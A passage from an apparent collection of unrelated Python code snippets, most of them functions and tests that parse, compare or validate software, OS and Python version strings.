minor_version = int(name.split(\"-\")[1].split(\".\")[1])\n if minor_version >= 7:\n return True\n else:\n return False\n else:\n return False", "def test_osx_version_number_value(self):\n \n running_version_number = get_osx_version()[0]\n \n # Check to make sure the returned valued is 10.11.1\n self.assertEqual(running_version_number, '10.11.1')", "def version_check(version):\n return {\n 1: 'OF10', # 0x01 -> OF1.0\n 3: 'OF12', # 0x03 -> OF1.2\n 4: 'OF13', # 0x04 -> OF1.3\n 5: 'OF14', # 0x05 -> OF1.4\n 6: 'OF15', # 0x06 -> OF1.5\n }.get(version, 0)", "def os_is_compatible(required_os_version: str) -> bool:\n\tcurrent_version = [int(c) for c in os_release().split('.')]\n\trequired_version = [int(c) for c in required_os_version.split('.')]\n\n\t# 10.13.6.2 is not (necessarily) compatible with 10.13.6\n\tif len(required_version) > len(current_version) and\\\n\t required_version[0:len(current_version)] == current_version:\n\t return False\n\n\t# Compare versions component-wise\n\tfor (c, r) in zip(current_version, required_version):\n\t\tif c < r:\n\t\t\treturn False\n\n\treturn True", "def testStratisVersion(self):\n version = Manager.Properties.Version.Get(get_object(TOP_OBJECT))\n (major, _, _) = version.split(\".\")\n self.assertEqual(major, \"0\")", "def check_pythonver(reqver_text):\n\treqver = map(int, reqver_text.split('.'))\n\tpythonver = sys.version_info[:3]\n\treturn check_ver(pythonver, reqver)", "def test_version():\n versions = ((2, 7, 16), (3, 5, 7), (3, 6, 8), (3, 7, 3))\n assert sys.version_info[:3] in versions", "def version_major_minor(version_string):\n return '.'.join(version_string.split('.')[0:2])", "def check_version_is_supported(name, version, min_version, help=''):\n if (pkg_resources.parse_version(version) <\n pkg_resources.parse_version(min_version)):\n # Version is too old.\n print('ERROR: Unsupported %s version: %s (minimum %s).%s' %\n (name, version, min_version, (' %s' % help) if help else ''),\n file=sys.stderr)\n exit(1)", "def check_if_version_supports_restricted(operator_version):\n try:\n the_version = operator_version.split(\"-\")[0]\n\n parts = the_version.split(\".\")\n if int(parts[0]) < 6:\n return False\n if int(parts[0]) >= 7:\n return True\n if int(parts[1]) > 2:\n return True\n if int(parts[1]) < 2:\n return False\n return int(parts[2]) >= 18\n # pylint: disable=W0703\n except Exception:\n logger.info(\"issues parsing version %s\", operator_version)\n return True", "def verify_ios_versionNumber():\r\n msg = \"\"\r\n try:\r\n 'Getting Version number for IOS '\r\n if g.platform == 'ios':\r\n text_view = ui_controls.text_view(get_obj_identifier('about_versionNumber_lbl'), label=True)\r\n\r\n 'Verifying whether Version number is matching with expected value IOS'\r\n if g.platform == 'ios' and text_view.strip() == g.version_number :\r\n print \"Version number is verified successfully. Expected : %s. Actual : %s\" % (g.version_number,text_view.strip())\r\n else:\r\n if g.platform == 'ios':\r\n print \"Version number is not verified successfully. Expected : %s. Actual : %s\" % (g.version_number, text_view.strip())\r\n return False, msg\r\n except Exception as excp:\r\n traceback.print_exc()\r\n msg += str(excp)\r\n return True, msg", "def test__get_program_version():\n version = util._get_program_version(\"midgard\")\n assert isinstance(version, str) and re.search(\"[0-9]\", version)", "def python_version_check():\n min_version_list = PYTHON_MIN_VERSION.split(\".\")\n # Truncate if the list is more the 4 items\n if len(min_version_list) > 4:\n min_version_list = min_version_list[:4]\n # Fill if the list is less then 4 items\n if len(min_version_list) == 1:\n min_version_list.append(\"0\")\n if len(min_version_list) == 2:\n min_version_list.append(\"0\")\n if len(min_version_list) == 3:\n min_version_list.append(\"f0\")\n # Calculate the minimum version and an integer, which, when displayed as\n # hex, is easily recognised as the version. E.g. 0x30502f0 is 3.5.2\n min_version_value = 0\n for index, item in enumerate(min_version_list[::-1]):\n min_version_value = min_version_value + int(item, 16) * 2**(index * 8)\n if debug: print(\"Python Version Minimum:{}, Decimal:{}, Hex:{}\"\n .format(PYTHON_MIN_VERSION, min_version_value,\n hex(min_version_value)))\n # test value and exit if below minimum revision\n if sys.hexversion < min_version_value:\n print(\"Python Version: {}. Required minimum version is: {}. Exiting...\"\n .format(sys.version.split(\" \")[0], PYTHON_MIN_VERSION))\n sys.exit()", "def test_osx_version_number_type(self):\n \n running_version_number = get_osx_version()[0]\n \n # Check to make sure the returned valued is a string\n self.assertEqual(type(running_version_number), str)", "def test_major(scraper, version_parts):\n\n new_version_parts = list(version_parts)\n new_version_parts[0] = int(new_version_parts[0]) + 1\n\n assert scraper.is_compatible_with(generate_version(new_version_parts)) is False", "def check_py_version(self, cur_version):\n\n # convert cur_version to string, in case of erroneous type being passed\n cur_version = str(cur_version)\n\n acceptable_python_versions_regex = r\"(^(2\\.[6-9])(\\.?\\d{1,2})?$)|(^(3\\.[3-9])(\\.?\\d{1,2})?$)\"\n pyversions_regex_compiled = re.compile(acceptable_python_versions_regex)\n pyversions_match = pyversions_regex_compiled.match(cur_version)\n\n # If match is found, return True. If no match, return False\n if pyversions_match:\n return True\n else:\n return False", "def check_version(ctx, _, value):\n if not value or ctx.resilient_parsing:\n return\n\n click.echo(f\"geocube v{importlib.metadata.version('geocube')}\")\n\n ctx.exit()", "def is_version_2_6() -> bool:\n v = get_version()\n if v[1] != \"singularity\" and v[1] != \"singularity-ce\":\n return False\n return v[0][0] == 2 and v[0][1] == 6", "def get_version():\n # this implementation avoids calling Foundation and will work on\n # non Apple OSes.\n vers = \"UNKNOWN\"\n build = \"\"\n # find the munkilib directory, and the version file\n munkilibdir = os.path.dirname(os.path.abspath(__file__))\n versionfile = os.path.join(munkilibdir, \"version.plist\")\n if os.path.exists(versionfile):\n try:\n vers_plist = readPlist(versionfile)\n except (IOError, OSError, ExpatError):\n pass\n else:\n try:\n vers = vers_plist['CFBundleShortVersionString']\n build = vers_plist['BuildNumber']\n except KeyError:\n pass\n if build:\n vers = vers + \".\" + build\n return vers", "def test_versionString(self):\n self.assertIn(\"%d.%d.%d\" % nevow.__version_info__, nevow.__version__)", "def test_major(self):\n self.assertEqual(\"0\", self._version1.major())\n self.assertEqual(\"1.2\", self._version2.major())", "def _validate_os(module):\n rc, out, err = module.run_command(['cat', '/etc/os-release'])\n\n # Validate for a BSD string in output\n if 'BSD' not in out:\n msg_err = 'Error: Unsupported OS. This can only be used on BSD systems.'\n module.fail_json(msg=msg_err)", "def is_version_3_1_or_newer() -> bool:\n if is_apptainer_1_or_newer():\n return True # this is equivalent to singularity-ce > 3.9.5\n v = get_version()\n return v[0][0] >= 4 or (v[0][0] == 3 and v[0][1] >= 1)", "def test_valid_hh_version():\n # TODO: Basically only enforcing correct main segment, since not using `re.fullmatch`\n # TODO: Probably want `re.fullmatch` here - Currently ignoring any potentially invalid suffix\n version_pattern = r\"^[0-9]+\\.[0-9]+\\.[0-9]+(|a[0-9]|b[0-9]|rc[0-9])\"\n res = re.match(version_pattern, hh.__version__)\n assert res is not None", "def _is_version_uptodate(self):\n logging.info(\"Checking tesseract version\")\n cmd = '%s -v' % (self.binary)\n logging.info(cmd) \n try:\n ret_output = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)\n except CalledProcessError:\n # Could not run tesseract\n error(self.msgs['TS_MISSING'])\n\n ver_str = '0.0.0'\n for line in ret_output.splitlines():\n if 'tesseract' in line:\n ver_str = line.split(' ')[1]\n if ver_str.endswith('dev'): # Fix for version strings that end in 'dev'\n ver_str = ver_str[:-3]\n\n # Iterate through the version dots\n ver = [int(x) for x in ver_str.split('.')]\n req = [int(x) for x in self.required.split('.')]\n\n # Aargh, in windows 3.02.02 is reported as version 3.02 \n # SFKM\n if str(os.name) == 'nt':\n req = req[:2]\n\n version_good = False\n for i,num in enumerate(req):\n if len(ver) < i+1:\n # This minor version number is not present in tesseract, so it must be\n # lower than required. (3.02 < 3.02.01)\n break\n if ver[i]==num and len(ver) == i+1 and len(ver)==len(req):\n # 3.02.02 == 3.02.02\n version_good = True\n continue\n if ver[i]>num:\n # 4.0 > 3.02.02\n # 3.03.02 > 3.02.02\n version_good = True\n break\n if ver[i]<num:\n # 3.01.02 < 3.02.02\n break\n \n return version_good, ver_str", "def _check_version(version):\n # Update cache if needed.\n if _check_version._versions_cache is None:\n log.debug(\"Loading versions cache ...\")\n _check_version._versions_cache = __salt__[\"netbeans.list_versions\"]()\n\n # Convert latest.\n if version is None or version == \"latest\":\n return __salt__[\"netbeans.pick_latest_version\"](\n _check_version._versions_cache\n )\n\n # Check if version is available.\n if version not in _check_version._versions_cache:\n return None\n return version", "def ipbb_version_t(version):\n if not re.match(r'^\\d\\.\\d\\.\\d+$', version):\n raise ValueError(\"not a valid IPBB version: '{version}'\".format(**locals()))\n return version", "def getOsVersion():\n os_version_tuple = platform.mac_ver()[0].split('.')\n return int(os_version_tuple[1])", "def check_os():\n\n if platform.system() != \"Darwin\":\n print \"This script only works on macos system\"\n exit(1)", "def is_version_3_or_newer() -> bool:\n if is_apptainer_1_or_newer():\n return True # this is equivalent to singularity-ce > 3.9.5\n v = get_version()\n return v[0][0] >= 3", "def test_minor(scraper, version_parts):\n\n new_version_parts = list(version_parts)\n new_version_parts[1] = int(new_version_parts[1]) + 1\n\n assert scraper.is_compatible_with(generate_version(new_version_parts)) is True", "def test_parse_version():\n version = VersionUtils.parse_version('9.5.3')\n assert version == VersionInfo(9, 5, 3)\n\n # Test #.# style versions\n v10_2 = VersionUtils.parse_version('10.2')\n assert v10_2 == VersionInfo(10, 2, 0)\n\n v11 = VersionUtils.parse_version('11')\n assert v11 == VersionInfo(11, 0, 0)\n\n # Test #beta# style versions\n beta11 = VersionUtils.parse_version('11beta3')\n assert beta11 == VersionInfo(11, 0, 0, prerelease='beta.3')\n\n assert v10_2 < beta11\n assert v11 > beta11\n\n # Test #rc# style versions\n version = VersionUtils.parse_version('11rc1')\n assert version == VersionInfo(11, 0, 0, prerelease='rc.1')\n\n # Test #nightly# style versions\n version = VersionUtils.parse_version('11nightly3')\n assert version == VersionInfo(11, 0, 0, 'nightly.3')\n\n v12_3_tde = VersionUtils.parse_version('12.3_TDE_1.0')\n assert v12_3_tde == VersionInfo(12, 3, 0)", "def test_rtax_supported_version(self):\r\n acceptable_version = [(0, 984)]\r\n self.assertTrue(which('rtax'),\r\n \"rtax not found. This may or may not be a problem depending on \" +\r\n \"which components of QIIME you plan to use.\")\r\n command = \"rtax 2>&1 > %s | grep Version | awk '{print $2}'\" % devnull\r\n proc = Popen(command, shell=True, universal_newlines=True,\r\n stdout=PIPE, stderr=STDOUT)\r\n stdout = proc.stdout.read()\r\n version_string = stdout.strip()\r\n try:\r\n version = tuple(map(int, version_string.split('.')))\r\n pass_test = version in acceptable_version\r\n except ValueError:\r\n pass_test = False\r\n version_string = stdout\r\n self.assertTrue(pass_test,\r\n \"Unsupported rtax version. %s is required, but running %s.\"\r\n % ('.'.join(map(str, acceptable_version)), version_string))", "def get_version():\n return '%d.%d.%d' % version_info", "def version_match(required, candidate):\n return _discover.version_match(required, candidate)", "def version(harness_string):\n lines = harness_string.split(\"\\n\")\n version_string = lines[1][11:]\n return [int(x) for x in version_string.split(\".\")]", "def get_min_cli_version(k8s_cli):\n return MIN_OC_VERSION_SUPPORT_RETRIES if (k8s_cli and k8s_cli.endswith(OC_K8S_CLI))\\\n else MIN_KUBECTL_VERSION_SUPPORT_RETRIES", "def find_xcode_major_version():\n cmd = ['xcodebuild', '-version']\n command_trace.log(cmd)\n\n result = str(subprocess.check_output(cmd))\n version = result.split('\\n', 1)[0]\n version = re.sub(r'Xcode ', '', version)\n version = re.sub(r'\\..*', '', version)\n return int(version)", "def test_version(self):\n v = version('/no/such/executable')\n self.assertEqual(v, '0.0.1.dev0')\n v = version('false')\n self.assertEqual(v, '0.0.1.dev0')\n v = version('echo')\n self.assertEqual(v, 'describe .devrev-list --count HEAD')", "def check_version(min_version: str,\n warning_only: bool = False,\n library: Optional[ModuleType] = None):\n # pylint: disable=import-outside-toplevel\n from .. import __version__\n if library is None:\n version = __version__\n name = 'GluonNLP'\n else:\n version = library.__version__\n name = library.__name__\n from packaging.version import parse\n bad_version = parse(version.replace('.dev', '')) < parse(min_version)\n if bad_version:\n msg = 'Installed {} version {} does not satisfy the ' \\\n 'minimum required version {}'.format(name, version, min_version)\n if warning_only:\n warnings.warn(msg)\n else:\n raise AssertionError(msg)", "def get_version_for(self,platform,version):\n def supports_platform(test_platforms):\n if test_platforms.upper() in ['ALL','ANY']:\n platforms = PLATFORMS\n else:\n platforms = test_platforms.split(':')\n return platform in platforms\n\n # Minimal required version check (for mainline releases)\n if self.min_versions:\n base_version = '.'.join(version.split('.')[:2])\n for base_min_version, min_version in (('.'.join(x.split('.')[:2]),x)\n for x in self.min_versions.split(';')):\n if compare_versions(base_version,base_min_version) == 0:\n if compare_versions(version,min_version) < 0:\n return None\n # Find the suitable test version\n candidate = '0'\n test = None\n for t in (t for t in self.versions if supports_platform(t.platform)):\n if compare_versions(version,t.firebird_version) >= 0:\n if compare_versions(candidate,t.firebird_version) < 0:\n candidate = t.firebird_version\n test = t\n return test", "def py_versiontest(c):\n pass", "def test_osx_version_name_value(self):\n \n running_version_name = get_osx_version()[1]\n \n # Check to make sure the returned valued is 10.11.1\n self.assertEqual(running_version_name, 'El Capitan')", "def getversion():\r\n\r\n global VERSION\r\n\r\n if len(VERSION) == 3:\r\n return '{}.{}.{}'.format(VERSION[0], VERSION[1], VERSION[2])\r\n else:\r\n return '{}.{}.{}-{}'.format(VERSION[0], VERSION[1], VERSION[2], VERSION[3])", "def get_major_version(version):\n parsed_version = version.split('.')\n return '.'.join(parsed_version[0:2])", "def get_os_match(host):\n for h in host:\n os_match = h.osmatch\n if os_match is not None:\n os_match = str(os_match)\n return os_match.split('\"')[1].split('\"')[0]\n else:\n return \"No OS version available.\"", "def is_version_3_4_or_newer() -> bool:\n if is_apptainer_1_or_newer():\n return True # this is equivalent to singularity-ce > 3.9.5\n v = get_version()\n return v[0][0] >= 4 or (v[0][0] == 3 and v[0][1] >= 4)", "def test_usearch_supported_version(self):\r\n acceptable_version = [(5, 2, 236), (5, 2, 236)]\r\n self.assertTrue(which('usearch'),\r\n \"usearch not found. This may or may not be a problem depending on \" +\r\n \"which components of QIIME you plan to use.\")\r\n command = \"usearch --version\"\r\n proc = Popen(command, shell=True, universal_newlines=True,\r\n stdout=PIPE, stderr=STDOUT)\r\n stdout = proc.stdout.read()\r\n version_string = stdout.split('v')[1]\r\n try:\r\n version = tuple(map(int, version_string.split('.')))\r\n pass_test = version in acceptable_version\r\n except ValueError:\r\n pass_test = False\r\n version_string = stdout\r\n self.assertTrue(pass_test,\r\n \"Unsupported usearch version. %s is required, but running %s.\"\r\n % ('.'.join(map(str, acceptable_version)), version_string))", "def python_compatible():\n result = False\n req_ver = vers.convert('3.9.5')\n pythonver = vers.convert('{major}.{minor}.{micro}'.format(major=sys.version_info.major,\n minor=sys.version_info.minor,\n micro=sys.version_info.micro))\n\n result = pythonver >= req_ver\n\n return result", "def detect_version_str(self):\n c3d_bin_path = op.dirname(self.locate_command())\n if platform.system() == 'Linux':\n libname = os.listdir(op.join(c3d_bin_path, '..', 'lib'))[0]\n version_str = libname.split('-')[-1]\n elif platform.system() == 'Darwin':\n info_list_path = op.join(c3d_bin_path, '..', 'Info.plist')\n info_etree = xml.etree.ElementTree.parse(info_list_path)\n elem_bodies = [e.text for e in info_etree.iter()]\n version_str = elem_bodies[\n elem_bodies.index('CFBundleShortVersionString') + 1]\n else:\n raise ArcanaVersionNotDetectableError(\n \"Can't detect c3d version on Windows\")\n return version_str", "def test_pre_release(scraper, version_parts):\n\n new_version_parts = list(version_parts)\n if len(new_version_parts) > 4:\n new_version_parts[4] = int(new_version_parts[4]) + 1\n elif len(new_version_parts) > 3:\n new_version_parts.append(1)\n else:\n new_version_parts.extend(['a', 1])\n\n assert scraper.is_compatible_with(generate_version(new_version_parts)) is True", "def test_osx_version_name_type(self):\n \n running_version_name = get_osx_version()[1]\n \n # Check to make sure the returned valued is a string\n self.assertEqual(type(running_version_name), str)", "def is_macosx():\n (sysname, nodename, release, version, machine) = os.uname()\n return sysname == 'Darwin'", "def test_get_simulator_runtime_by_version(self, _, _2):\n self.assertEqual(\n 'com.apple.CoreSimulator.SimRuntime.iOS-13-2',\n iossim_util.get_simulator_runtime_by_version(\n iossim_util.get_simulator_list(), '13.2.2'))", "def validate_required_python_version_running(minimal_required_version: str) -> None:\n try:\n parts = minimal_required_version.split(\".\")\n min_py_version = 1000000*int(parts[0]) + 1000*(int(parts[1]) if len(parts) > 1 else 0) + (int(parts[2]) if len(parts) > 2 else 0)\n running_py_version = 1000000*sys.version_info.major + 1000*sys.version_info.minor + sys.version_info.micro\n if running_py_version < min_py_version:\n raise RuntimeError(\"\")\n except:\n raise RuntimeError(f\"Kqlmagic requires python >= {Constants.MINIMAL_PYTHON_VERSION_REQUIRED}, you use python {sys.version}\")", "def check_pkgcfg_ver(reqver_text, pkgname):\n\treqver = map(int, reqver_text.split('.'))\n\tpkgcmd = os.popen(pkg_config_path +\n ' pkg-config --modversion ' + pkgname, 'r')\n\tpkgcmd_text = pkgcmd.read()\n\tpkgcmd.close()\n\tmatch = re.search(r'^([0-9]+)\\.([0-9]+)\\.([0-9]+)', pkgcmd_text)\n\tif match:\n\t\tpkgver_str = match.groups()\n\t\tpkgver = map(int, pkgver_str)\n\t\treturn check_ver(pkgver, reqver)\n\telse:\n\t\treturn '<not found>'", "def is_version_valid(version):\n return _compiled_version_regex.match(version) is not None", "def is_dev(version):\n return re.match(r'^.*\\.dev\\d+$', version)", "def test_raxmlHPC_supported_version(self):\r\n acceptable_version = [(7, 3, 0), (7, 3, 0)]\r\n self.assertTrue(which('raxmlHPC'),\r\n \"raxmlHPC not found. This may or may not be a problem depending on \" +\r\n \"which components of QIIME you plan to use.\")\r\n command = \"raxmlHPC -v | grep version\"\r\n proc = Popen(command, shell=True, universal_newlines=True,\r\n stdout=PIPE, stderr=STDOUT)\r\n stdout = proc.stdout.read()\r\n version_string = stdout.strip().split(' ')[4].strip()\r\n try:\r\n version = tuple(map(int, version_string.split('.')))\r\n pass_test = version in acceptable_version\r\n except ValueError:\r\n pass_test = False\r\n version_string = stdout\r\n self.assertTrue(pass_test,\r\n \"Unsupported raxmlHPC version. %s is required, but running %s.\"\r\n % ('.'.join(map(str, acceptable_version)), version_string))", "def valid_suffix(suffix):\n suffix = suffix.strip()\n if not suffix:\n return suffix\n allowed = set('.dev0123456789')\n disallowed = set(suffix).difference(allowed)\n if disallowed:\n disallowed = ''.join(sorted(disallowed))\n raise ValueError('Version suffix contains disallowed characters'\n ' (%(disallowed)s)'\n % locals())\n chunks = suffix.split('.')\n chunk = chunks.pop(0)\n if chunk:\n raise ValueError('Version suffix must start with \".\"'\n ' (%(suffix)r)'\n % locals())\n if not chunks:\n raise ValueError('Version suffix is too short'\n ' (%(suffix)r)'\n % locals())\n for chunk in chunks:\n if not chunk:\n raise ValueError('Empty chunk %(chunk)r in '\n 'version suffix %(suffix)r'\n % locals())\n char = chunk[0]\n if char in '0123456789':\n raise ValueError('Chunk %(chunk)r of version suffix %(suffix)r'\n ' starts with a digit'\n % locals())\n char = chunk[-1]\n if char not in '0123456789':\n raise ValueError('Chunk %(chunk)r of version suffix %(suffix)r'\n ' doesn\\'t end with a digit'\n % locals())\n return suffix # ... valid_suffix\n # ... get the version ...\n # ... get the version ...", "def test_uclust_supported_version(self):\r\n acceptable_version = (1, 2, 22)\r\n self.assertTrue(which('uclust'),\r\n \"uclust not found. This may or may not be a problem depending on \" +\r\n \"which components of QIIME you plan to use.\")\r\n command = 'uclust --version'\r\n proc = Popen(command, shell=True, universal_newlines=True,\r\n stdout=PIPE, stderr=STDOUT)\r\n stdout = proc.stdout.read()\r\n version_string = stdout.strip().split('v')[-1].strip('q')\r\n try:\r\n version = tuple(map(int, version_string.split('.')))\r\n pass_test = version == acceptable_version\r\n except ValueError:\r\n pass_test = False\r\n version_string = stdout\r\n self.assertTrue(pass_test,\r\n \"Unsupported uclust version. %s is required, but running %s.\"\r\n % ('.'.join(map(str, acceptable_version)), version_string))", "def contracts_version_monitoring_service_takes_token_network_registry(\n version: Optional[str],\n) -> bool:\n if version is None:\n # stock version in `data`\n return True\n return VersionInfo.parse(version).compare(\"0.22.0\") > 0", "def _version_to_shorthand(version):\n parts = version.split('.')\n if len(parts) != 2 and len(parts) != 3:\n tmpl = 'Version string must be like X.Y or X.Y.Z, not `{}`'\n raise ValueError(tmpl.format(version))\n return parts[0] + parts[1]", "def test_package_version():\n coverage_version = package_version('coverage')\n pytest_version = package_version('pytest')\n\n assert coverage_version is not None\n assert coverage_version < (1000, 0, 0)\n assert pytest_version is not None\n assert pytest_version > (5, 0)", "def version_number() -> int:\n return 0", "def test(self,version=''):\n p5cmd = ['srvinfo', 'lexxvers']\n try:\n res = self.nsdchat_call(p5cmd,5)\n p5_version = singlevalue(res)\n if (p5_version >= str(version)):\n return True\n return False\n except subprocess.TimeoutExpired:\n print(\"Could not connect to the archiware p5 server.\\nPlease review\"\n \"the connection and firewall settings.\")\n raise", "def get_major_version(version):\n return str(check_version(version)[0])", "def test__print_version(capsys):\n util._print_version(\"midgard\")\n version, _ = capsys.readouterr()\n assert isinstance(version, str) and re.search(\"[0-9]\", version)", "def protocol(ver):\r\n if ver == 1:\r\n return 1\r\n\r\n if ver == 2:\r\n return 2\r\n\r\n\r\n raise ValueError", "def test_get_python_version():\n assert re.match(\"^[a-zA-Z0-9_]+, version [0-9.]+\", util.get_python_version())", "def _GetSystemVersion(self, component, info):\n # Check if we are on mario, then we need to use the legacy parser\n if self.ChromeOSBoard() == 'x86-mario':\n return self._GetSystemVersionMario(component, info)\n items = info.strip().splitlines()\n # This is going to give us a list of lines, we are looking for the\n # following ones:\n # BIOS version: board.xx.xx.xxx.xxx.xx\n # EC version: foobar\n for line in items:\n line_components = line.split(':')\n # The line we are looking for has at least 2 items\n if len(line_components) >= 2 and line_components[0] == component:\n return line_components[1].strip()\n self.fail('Could not locate the following item %s in the return value '\n 'of chromeos-firmwareupdate.' % component)", "def have_compatible_glibc(major, minimum_minor):\n import ctypes # pylint: disable=bad-option-value,import-outside-toplevel\n\n process_namespace = ctypes.CDLL(None)\n try:\n gnu_get_libc_version = process_namespace.gnu_get_libc_version\n except AttributeError:\n # Symbol doesn't exist -> therefore, we are not linked to\n # glibc.\n return False\n\n # Call gnu_get_libc_version, which returns a string like \"2.5\".\n gnu_get_libc_version.restype = ctypes.c_char_p\n version_str = gnu_get_libc_version()\n # py2 / py3 compatibility:\n if not isinstance(version_str, str):\n version_str = version_str.decode(\"ascii\")\n\n # Parse string and check against requested version.\n version = [int(piece) for piece in version_str.split(\".\")]\n assert len(version) == 2\n if major != version[0]:\n return False\n if minimum_minor > version[1]:\n return False\n return True", "def verify_Version_buildNumber():\r\n msg, flag = \"\", False\r\n try:\r\n 'Getting Build number for IOS '\r\n if g.platform == 'ios':\r\n flag1, msg1 = verify_ios_versionNumber()\r\n msg += msg1\r\n flag2, msg2 = verify_ios_buildNumber()\r\n msg += msg2\r\n 'go back'\r\n flag3=ui_controls.image(get_obj_identifier('about_back_btn'))\r\n print 'cliked on back button'\r\n flag = False if not (flag1 and flag2 and flag3) else True\r\n else:\r\n text_view = ui_controls.text_view(get_obj_identifier('about_buildVersion_lbl'))\r\n \r\n if text_view.strip() == g.android_version_no.strip():\r\n \r\n print \"Version and Build number matched. Expected : %s. Actual : %s\" % (g.android_version_no, text_view.strip())\r\n flag = True \r\n else:\r\n \r\n print \"Version and Build number does not match. Expected : %s. Actual : %s\" % (g.android_version_no, text_view.strip())\r\n flag1=ui_controls.back_button()\r\n \r\n flag = False if not (flag1) else True\r\n except Exception as excp:\r\n traceback.print_exc()\r\n msg += str(excp)\r\n return flag, msg", "def test_version(self, parse_input):\n bb = parse_input(\"name testname\\nversion 1.0\")\n assert bb.version == \"1.0\"\n\n bb = parse_input(\"name testname\\nversion 1.12\")\n assert bb.version == \"1.12\"", "def test_pynast_suported_version(self):\r\n min_acceptable_version = (1, 2)\r\n max_acceptable_version = (1, 2, 2)\r\n try:\r\n from pynast import __version__ as pynast_lib_version\r\n version = pynast_lib_version.split('.')\r\n if version[-1][-4:] == '-dev':\r\n version[-1] = version[-1][:-4]\r\n version = tuple(map(int, version))\r\n pass_test = (version >= min_acceptable_version and\r\n version <= max_acceptable_version)\r\n version_string = str(pynast_lib_version)\r\n except ImportError:\r\n pass_test = False\r\n version_string = \"Not installed\"\r\n\r\n min_version_str = '.'.join(map(str, min_acceptable_version))\r\n max_version_str = '.'.join(map(str, max_acceptable_version))\r\n error_msg = (\"Unsupported pynast version. Must be >= %s and <= %s, \"\r\n \"but running %s.\" % (min_version_str, max_version_str,\r\n version_string))\r\n self.assertTrue(pass_test, error_msg)", "def _check_package_version(package, min_version):\n # Re-raise with a more informative message when the package is not\n # installed\n try:\n module = import_module(package)\n except ModuleNotFoundError:\n raise ModuleNotFoundError(\"Please install {0} with a version >= \"\n \"{1} in order to install scikit-lr.\"\n .format(package, min_version))\n\n if LooseVersion(module.__version__) < min_version:\n raise ValueError(\"The current version of {0} is {1} installed in {2}.\"\n .format(package, module.__version__, module.__path__))", "def osversion():\n return platform()", "def parse_version_major(bin_path):\n version = parse_version(bin_path)\n return int(version.split(\".\")[0]) if version else None", "def semantic_version(value):\n try:\n semantic_version_module.Version(value)\n return True\n except ValueError:\n return False", "def check_for_updates(package_name, latest_version_str, our_version_str=VERSION):\n our = dict()\n latest = dict()\n for version, suffix in ((our, our_version_str), (latest, latest_version_str)):\n for part in ['major', 'minor', 'patch']:\n version[part], _, suffix = suffix.partition('.')\n version[part] = int(version[part])\n version['suffix'] = suffix\n\n for part in ['major', 'minor', 'patch', 'suffix']:\n if latest[part] > our[part]:\n if part == 'major':\n sys.exit(messages['UpdateRequired'].format(package_name))\n else:\n print >> sys.stderr, messages['UpdateAvailable'].format(package_name)\n return", "def _get_valid_version(number: str) -> int:\n version = int(number)\n if version >= 0:\n return version\n raise ValueError(\"Each number version must be positive!\")", "def test_get_ucs_version(self):\n ver = self.u.get_ucs_version()\n self.assertTrue(isinstance(ver, basestring))\n self.assertEqual('3.0-1', ver)", "def check_os_version():\n if not version.is_supported_version():\n supported_releases = []\n for rel in version.SUPPORTED_VERSIONS:\n for ver in version.SUPPORTED_VERSIONS[rel]:\n supported_releases.append(rel.upper() + ' ' + ver)\n reporting.create_report([\n reporting.Title(\n 'The installed OS version is not supported for the in-place upgrade to the target RHEL version'\n ),\n reporting.Summary(\n 'The supported OS releases for the upgrade process:\\n'\n ' {}'.format('\\n'.join(supported_releases))\n ),\n reporting.Severity(reporting.Severity.HIGH),\n reporting.Groups(COMMON_REPORT_TAGS),\n reporting.Groups([reporting.Groups.INHIBITOR]),\n # we want to set a static Key here because of different Title per path\n reporting.Key('1c7a98849a747ec9890f04bf4321de7280970715')\n ] + related)", "def installedVersion():\n\n cmd = f'{dcm2niix()} -h'\n versionPattern = re.compile(r'v'\n r'(?P<major>[0-9]+)\\.'\n r'(?P<minor>[0-9]+)\\.'\n r'(?P<year>[0-9]{4})'\n r'(?P<month>[0-9]{2})'\n r'(?P<day>[0-9]{2})')\n\n try:\n output = sp.check_output(cmd.split()).decode()\n output = [l for l in output.split('\\n') if 'version' in l.lower()]\n output = '\\n'.join(output).split()\n\n for word in output:\n\n match = re.match(versionPattern, word)\n\n if match is not None:\n return (int(match.group('major')),\n int(match.group('minor')),\n int(match.group('year')),\n int(match.group('month')),\n int(match.group('day')))\n\n except Exception as e:\n log.debug(f'Error parsing dcm2niix version string: {e}')\n return None", "def test_python_supported_version(self):\r\n min_acceptable_version = (2, 7, 0)\r\n min_unacceptable_version = (3, 0, 0)\r\n\r\n command = 'python --version'\r\n proc = Popen(command, shell=True, universal_newlines=True,\r\n stdout=PIPE, stderr=STDOUT)\r\n stdout = proc.stdout.read()\r\n\r\n version_str_matches = re.findall('Python\\s+(\\S+)\\s*', stdout.strip())\r\n self.assertEqual(len(version_str_matches), 1,\r\n \"Could not determine the Python version in '%s'.\" %\r\n stdout)\r\n version_string = version_str_matches[0]\r\n\r\n try:\r\n if version_string[-1] == '+':\r\n version_string = version_string[:-1]\r\n version = tuple(map(int, version_string.split('.')))\r\n if len(version) == 2:\r\n version = (version[0], version[1], 0)\r\n pass_test = (version >= min_acceptable_version and\r\n version < min_unacceptable_version)\r\n except ValueError:\r\n pass_test = False\r\n version_string = stdout\r\n self.assertTrue(pass_test,\r\n \"Unsupported Python version. Must be >= %s and < %s, \"\r\n \"but running %s.\"\r\n % ('.'.join(map(str, min_acceptable_version)),\r\n '.'.join(map(str, min_unacceptable_version)),\r\n version_string))", "def check_openhpiver(reqver_text):\n\treturn check_pkgcfg_ver(reqver_text, 'openhpi')", "def _parse_version(version):\n return version.split(\".\")[0]", "def is_osx():\n return sys.platform == \"darwin\"", "def guessNSVersion( elfPath, linkName, defaultVersion ):\n\n # Guess 1\n cmdLine = [ elfPath, \"-version\",\n \"|\", grep, \"Package:\" ]\n line = safeRun( cmdLine ).strip()\n if line != \"\":\n # e.g.: Package: netschedule 4.8.1, build Jun 7 2011 16:07:33\n line = line.split( ',' )[ 0 ].replace( 'Package: netschedule ', \"\" )\n if line != '0.0.0':\n if isVersionFormat( line ):\n return line\n\n # Guess 2\n line = os.path.basename( linkName )\n if isVersionFormat( line ):\n return line\n\n return defaultVersion", "def require_version(version):\n def check_require_version(f):\n version_elements = version.split('.')\n try:\n compare = tuple([int(v) for v in version_elements])\n except ValueError:\n raise ValueError('%s is not a correct version : should be X.Y[.Z].' % version)\n current = sys.version_info[:3]\n if current < compare:\n def new_f(self, *args, **kwargs):\n self.skipTest('Need at least %s version of python. Current version is %s.' % (version, '.'.join([str(element) for element in current])))\n new_f.__name__ = f.__name__\n return new_f\n else:\n return f\n return check_require_version", "def version():\n cmd = \"{} -v\".format(_detect_os())\n out = 